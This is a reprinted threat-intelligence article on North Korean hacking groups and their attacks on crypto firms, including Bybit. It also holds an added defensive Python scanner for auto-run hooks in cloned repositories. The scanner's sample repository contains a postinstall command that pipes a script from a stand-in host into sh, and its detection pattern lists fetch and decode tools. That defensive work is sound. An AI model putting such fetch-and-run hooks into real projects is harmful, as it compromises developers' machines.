Paradigm: Uncovering the Mystery of the Threat of the North Korean Hacker Group Lazarus Group

Reprinted from chaincatcher
04/02/2025
Original title: "Demystifying the North Korean Threat"
Author: samczsun, Research Partner, Paradigm
Compiled by: Bright, Foresight News
One morning in February, the SEAL 911 group chat lit up as we watched in confusion while Bybit moved over $1 billion of tokens out of its cold wallet to a brand-new address and quickly began liquidating over $200 million of liquid staking tokens (LSTs). Within minutes we had confirmation from the Bybit team and from independent analysis that this was not routine maintenance: the multisig, previously a publicly verified Safe{Wallet} implementation, was now pointing at newly deployed, unverified contracts. Someone had just pulled off the largest hack in cryptocurrency history, and we had front-row seats.
While some team members (and the broader sleuthing community) began tracking the funds and notifying partner exchanges, the rest of the team tried to work out exactly what had happened and whether other funds were at risk. Fortunately, identifying the perpetrator was easy. In the past few years, only one known threat actor has successfully stolen billions of dollars from cryptocurrency exchanges: North Korea, also known as the DPRK.
Beyond that, however, we had few leads. Because North Korean hackers are sophisticated and very good at covering their tracks, it is hard to determine the root cause of an intrusion, and hard even to know which specific North Korean team is responsible. All we had to go on was existing intelligence showing that North Korea likes to break into cryptocurrency exchanges through social engineering. So we guessed that North Korea had probably compromised one of Bybit's multisig signers and planted malware that interfered with the signing process.
That guess turned out to be completely wrong. A few days later we learned that North Korea had in fact compromised Safe{Wallet}'s own infrastructure and deployed a malicious override that specifically targeted Bybit. Nobody had considered or prepared for this level of sophistication, and it poses a serious challenge to many of the security models in use today.
North Korean hackers are an increasingly serious threat to our industry, and we cannot defeat an adversary we do not understand. There are many incident write-ups and articles covering individual aspects of North Korea's cyber operations, but they are hard to piece together. I hope this overview gives people a more complete picture of how North Korea operates, along with its tactics, techniques and procedures, so that we can put the right mitigations in place.
Organizational structure
Perhaps the biggest misunderstanding to clear up is how to classify and name North Korea's many cyber activities. It is acceptable to use "Lazarus Group" as a colloquial catch-all, but a more precise vocabulary helps when discussing North Korea's cyber threats in detail.
First, it helps to understand North Korea's "org chart". At the top sits North Korea's ruling (and only) party, the Workers' Party of Korea (WPK), which leads every government body in the country. These include the Korean People's Army (KPA) and the Central Committee. The KPA contains the General Staff Department (GSD), which is where the Reconnaissance General Bureau (RGB) sits. The Munitions Industry Department (MID) sits under the Central Committee.
The RGB is responsible for almost all of North Korea's cyber operations, including nearly everything the cryptocurrency industry has observed. Besides the infamous Lazarus Group, other threat actors that sit under the RGB include AppleJeus, APT38, Dangerous Password and TraderTraitor. The MID, on the other hand, runs North Korea's nuclear and missile programs and is the main source of the North Korean IT workers that the intelligence community tracks as Contagious Interview and Wagemole.
Lazarus Group
Lazarus Group is a highly sophisticated hacking group, and cybersecurity experts attribute some of the largest and most destructive attacks in history to it. Novetta first identified the Lazarus Group in 2016 while analyzing the hack of Sony Pictures Entertainment.
In 2014, Sony was producing the action comedy "Assassination of Kim Jong-un", whose central plot point was the humiliation and subsequent assassination of Kim Jong-un. Understandably, the North Korean regime did not welcome this, and it retaliated by breaking into Sony's network, stealing terabytes of data, leaking hundreds of gigabytes of confidential or otherwise sensitive information and deleting the originals. As then-CEO Michael Lynton put it, "The people who did this not only took everything in the house, they burned the house down." In the end, Sony's investigation and remediation of the attack cost at least $15 million, and the true losses may have been higher.
Then, in 2016, a threat actor closely resembling the Lazarus Group broke into Bangladesh Bank intending to steal nearly $1 billion. Over the course of a year, the attackers ran social engineering campaigns against Bangladesh Bank employees, eventually gaining remote access and moving laterally through the bank's internal network until they reached the machine responsible for interacting with the SWIFT network. Then they waited for the perfect window: Bangladesh Bank's weekend begins on Thursday, while the Federal Reserve Bank of New York's begins on Friday. On Thursday night Bangladesh time, which was Thursday morning in New York, the attackers used their SWIFT access to send 36 separate transfer requests to the Federal Reserve Bank of New York. Over the next 24 hours, the New York Fed forwarded the transfers to the Rizal Commercial Banking Corporation (RCBC) in the Philippines, which began processing them. When Bangladesh Bank reopened, it discovered the intrusion and tried to tell RCBC to halt the transfers in progress, only to find that RCBC was closed for the Lunar New Year holiday.
Finally, in 2017, the massive WannaCry 2.0 ransomware outbreak crippled organizations across industries worldwide and was attributed in part to the Lazarus Group. WannaCry is estimated to have caused billions of dollars in damage: using a Microsoft Windows exploit originally developed by the NSA, it not only encrypted the local machine but also spread to any other reachable machines, eventually infecting hundreds of thousands of devices around the world. Fortunately, the damage was contained because security researcher Marcus Hutchins discovered and activated its kill switch within eight hours.
Looking at the Lazarus Group's history, they have demonstrated exceptional technical skill and operational capability, and one of their goals is to generate revenue for the North Korean regime. It was therefore only a matter of time before they turned their attention to the cryptocurrency industry.
Derivatives
Over time, as "Lazarus Group" became the catch-all term the media used for North Korean cyber activity, the cybersecurity industry developed more precise names for specific Lazarus Group and North Korean operations. APT38 is one example: it split off from the Lazarus Group around 2016 to focus on financial crime, first targeting banks (such as Bangladesh Bank) and then cryptocurrencies. Later, in 2018, a new threat actor called AppleJeus was found spreading malware aimed at cryptocurrency users. Finally, by 2018, when OFAC first announced sanctions on two front companies used by North Koreans, North Koreans posing as IT workers had already infiltrated the tech industry.
North Korean IT Workers
Although the earliest record of North Korean IT workers is the 2018 OFAC sanctions, Unit 42's 2023 report gives a more detailed description and identifies two distinct threat actors: Contagious Interview and Wagemole.
Contagious Interview reportedly impersonates recruiters from well-known companies and lures developers into a fake interview process. The candidate is then told to clone a repository for local debugging, ostensibly as a coding challenge, but the repository contains a backdoor that runs during that step and hands control of the affected machine to the attacker. This campaign is ongoing; the most recent record is from August 11, 2024.
Wagemole agents, by contrast, do not aim to recruit potential victims but to be hired by a company, where they simply work as ordinary engineers, though perhaps not very productive ones. That said, there are records of IT workers using their access to carry out attacks: in the Munchables incident, an employee linked to North Korean activity used their privileged access to the smart contracts to steal all of the assets.
The sophistication of Wagemole agents varies, from reused resume templates and reluctance to join video calls to highly customized resumes, deeply faked video interviews and identity documents such as driver's licenses and utility bills. In some cases an agent lurks inside the victim organization for up to a year, then uses their access to break into other systems and/or cash out entirely.
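The Contagious Interview pattern above relies on a "coding challenge" repository that executes code the moment a developer installs its dependencies or opens it in an editor. As an added illustration of the defensive side (example code written for this overview, not code from the article or from Unit 42), the script below audits a freshly cloned repository for the places where such automatic execution can hide: npm lifecycle scripts in package.json (preinstall, install, postinstall, prepare, prepublish, which npm really does run on install) and VS Code tasks configured with "runOn": "folderOpen". The sample repository it writes to a temporary directory is constructed for the demo, and the regular expression of "suspicious" command fragments is an illustrative assumption, not a complete list.

```python
# Added example: audit a cloned repository for hooks that run automatically on
# `npm install` or on opening the folder in VS Code, before running anything locally.
# Not the article's code. The sample repository below is constructed for the demo.
import json
import os
import re
import tempfile

# npm runs these scripts automatically during `npm install` (real npm behaviour).
NPM_AUTO_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
# Command fragments that often fetch or decode-and-run remote code.
# Assumption: illustrative patterns only, not an exhaustive detection list.
SUSPICIOUS = re.compile(r"curl|wget|Invoke-WebRequest|base64|eval\(|child_process|\bsh -c\b", re.I)


def _load_json(path):
    with open(path, encoding="utf-8") as f:
        return json.load(f)


def _check_package_json(path, rel):
    """Flag npm lifecycle scripts that run without the developer asking for them."""
    findings = []
    for hook, cmd in _load_json(path).get("scripts", {}).items():
        if hook in NPM_AUTO_HOOKS:
            severity = "high" if SUSPICIOUS.search(cmd) else "medium"
            findings.append((severity, rel, f"npm hook '{hook}' runs on install: {cmd}"))
    return findings


def _check_vscode_tasks(path, rel):
    """Flag VS Code tasks that start as soon as the folder is opened."""
    findings = []
    for task in _load_json(path).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            label, cmd = task.get("label", "?"), task.get("command", "")
            findings.append(("high", rel, f"VS Code task '{label}' runs on folder open: {cmd}"))
    return findings


def scan_repo(root):
    """Return (severity, relative_path, description) tuples, highest severity first."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in (".git", "node_modules")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                if name == "package.json":
                    findings += _check_package_json(path, rel)
                elif rel.endswith(".vscode/tasks.json"):
                    findings += _check_vscode_tasks(path, rel)
            except (json.JSONDecodeError, UnicodeDecodeError):
                # JSON-with-comments or binary junk: still worth a human look.
                findings.append(("low", rel, "could not parse; review manually"))
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda item: order[item[0]])


def build_sample_repo():
    """Constructed sample: a 'coding challenge' repo with one benign script and two auto-run hooks."""
    root = tempfile.mkdtemp(prefix="challenge-")
    os.makedirs(os.path.join(root, ".vscode"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as f:
        json.dump({"name": "challenge", "scripts": {
            "test": "jest",  # only runs when the developer explicitly asks for it
            "postinstall": "curl -fsSL https://example.invalid/bootstrap.sh | sh",  # constructed
        }}, f)
    with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as f:
        json.dump({"version": "2.0.0", "tasks": [{
            "label": "setup", "type": "shell", "command": "sh ./setup.sh",
            "runOptions": {"runOn": "folderOpen"}}]}, f)
    return root


if __name__ == "__main__":
    for severity, rel, desc in scan_repo(build_sample_repo()):
        print(f"[{severity}] {rel}: {desc}")
```

Run the scan on the clone before `npm install` or before opening the folder in an editor with workspace trust disabled; a "high" finding means the repository would execute a command on its own, and the "coding challenge" should be treated as untrusted until someone has read that command.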
AppleJeus
AppleJeus focuses on distributing malware and specializes in complex supply chain attacks. In 2023, the 3CX supply chain attack gave the attackers the ability to infect more than 12 million users of the 3CX VoIP software; it later emerged that 3CX itself had been compromised through a supply chain attack on one of its upstream suppliers, Trading Technologies.
In the cryptocurrency industry, AppleJeus initially distributed malware disguised as legitimate software such as trading applications or cryptocurrency wallets. Its tactics have changed over time, however. In October 2024, Radiant Capital was compromised by a threat actor who posed as a trusted contractor and delivered malware via Telegram; Mandiant attributed the attack to AppleJeus.
Dangerous Password
Dangerous Password is responsible for low-sophistication, social-engineering-based attacks on the cryptocurrency industry. As far back as 2019, JPCERT/CC documented Dangerous Password sending phishing emails with enticing attachments for users to download. In the past few years, Dangerous Password has sent phishing emails impersonating well-known industry figures, with subject lines such as "Stablecoins and crypto assets are extremely risky."
Today, Dangerous Password still sends phishing emails but has also expanded to other platforms. For example, Radiant Capital reported receiving a phishing message via Telegram from someone posing as a security researcher who was distributing a file named "Penpie_Hacking_Analysis_Report.zip". Users have also reported being contacted by people claiming to be reporters or investors who ask to schedule calls on an obscure video conferencing app. Like Zoom, these apps download a one-time installer, but the installer drops malware on the device.
TraderTraitor
TraderTraitor is the most sophisticated North Korean threat actor targeting the cryptocurrency industry and is behind the attacks on Axie Infinity and Rain.com, among others. TraderTraitor targets almost exclusively exchanges and other companies holding large reserves, and rather than using zero-day vulnerabilities against them it relies on highly sophisticated spear-phishing. In the Axie Infinity case, TraderTraitor contacted a senior engineer via LinkedIn, convinced them to go through a series of interviews, and then sent an "offer" that delivered the malware. In the WazirX hack, TraderTraitor compromised an unidentified component of the signing pipeline, then drained the exchange's hot wallet by repeatedly depositing and withdrawing funds until WazirX engineers had to rebalance from the cold wallet to the hot wallet. When the engineers went to sign the transfer, they were tricked into signing a transaction that handed control of the cold wallet to TraderTraitor. The February 2025 Bybit attack followed the same pattern: TraderTraitor first compromised Safe{Wallet}'s infrastructure through social engineering, then deployed malicious JavaScript to the Safe{Wallet} frontend that specifically targeted Bybit's cold wallet. When Bybit went to rebalance its wallets, the malicious code activated and caused Bybit's engineers to sign a transaction handing control of the cold wallet to TraderTraitor.
Stay safe
North Korea has shown it can deploy zero-day vulnerabilities against its adversaries, but there is no record or known incident of North Korea using a zero-day against the cryptocurrency industry. As a result, standard security advice applies to almost every threat from North Korean hackers.
As an individual, use common sense and stay alert to social engineering. For example, if someone claims to have highly confidential information and is willing to share it with you, be careful. Or if someone pressures you to download and run some software right away, ask yourself whether they are trying to push you into a situation where you cannot think clearly.
As an organization, apply the principle of least privilege wherever possible. Minimize the number of people with access to sensitive systems and make sure they use password managers and 2FA. Keep personal devices separate from work devices, and install mobile device management (MDM) and endpoint detection and response (EDR) software on work devices so that you have protection before an intrusion and visibility after one.
Unfortunately, TraderTraitor can break in even without zero-day vulnerabilities. Additional precautions are therefore needed to make sure there is no single point of failure, so that a single intrusion does not cost you all of your funds.
Even if everything else fails, though, there is still hope. The FBI has a unit dedicated to tracking and disrupting North Korean intrusions, which has been issuing victim notifications for years, and I have recently had the pleasure of helping its agents get in touch with potential North Korean targets. So, to prepare for the worst, make sure you have public contact information or know enough people in the ecosystem (such as SEAL 911) that a message passing through the social graph can reach you as quickly as possible.